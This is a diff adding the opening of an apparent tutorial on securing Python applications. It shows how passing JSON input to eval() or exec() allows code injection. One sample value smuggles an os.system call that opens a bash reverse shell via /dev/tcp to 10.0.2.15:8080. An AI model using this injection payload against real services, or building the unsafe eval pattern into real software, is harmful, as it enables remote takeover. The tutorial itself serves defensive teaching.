articles/securing-your-python-application-from-hackers/index.md

```diff
@@ -0,0 +1,176 @@
+### Introduction 
+It is possible to create a secure program using a language that is full of vulnerabilities, and also it is possible to create a vulnerable program using a language designed to be secure.
+
+Python has become immensely useful in Cyber Security as it supports and performs a multitude of Cyber Security functions such as malware analysis, scanning, and penetration testing functions. However, it might be very easy to make a mistake in any Python code and make the program vulnerable.
+
+In this tutorial, I will help you avoid those mistakes.
+
+![](https://media.giphy.com/media/3oKIPcqmx1mpCOJJp6/giphy.gif)
+
+### Dangerous functions
+Some functions can be dangerous by performing a sort of code injection and an authentication bypass. Let's be in the hacker's shoes, think like him, and learn how to protect our code.
+
+#### Eval()
+Python’s `eval()` gives you the ability to pass a string to execute it as a code. For example, `eval("2 ** 8")` will return `256`.
+Let's make a simple python code:
+
+```python
+def addition(x, y):
+  return eval("%s + %s" % (x, y))
+
+result = addition(2, 4)
+print(result)
+```
+This is a very simple calculator, which gives you the sum of two numbers. If you execute the code, then you will have `6` as a result.
+
+Now let's turn this calculator to an application that uses JSON to pass user input:
+
+```python
+def addition(x, y):
+  return eval("%s + %s" % (x, y))
+
+result = addition(request.json['x'], request.json['y'])
+print("Our result is %d." % result)
+```
+If we pass `{"x":"2", "y":"4"}` as our previous code, then the result will be `6` of course. But as we are thinking as a hacker, then let's try to provide something else:
+
+```python
+{"x":"__import__('os').system('bash -i >& /dev/tcp/10.0.2.15/8080 0>&1')#", "y":"4"}
+```
+This malicious code will force our calculator to call `os.system` then spawn a reverse shell to the IP "10.0.2.15" on PORT "8080".
+
+#### Exec()
+This function is just like `Eval()` which executes a string or a code object. You have just to replace the second line of our last code with:
+
+```python
+return exec("%s + %s" % (x, y))
+```

```

Comment:
The previous snippet is not a big one. So, I think it's just better to provide the entire snippet to avoid any confusion.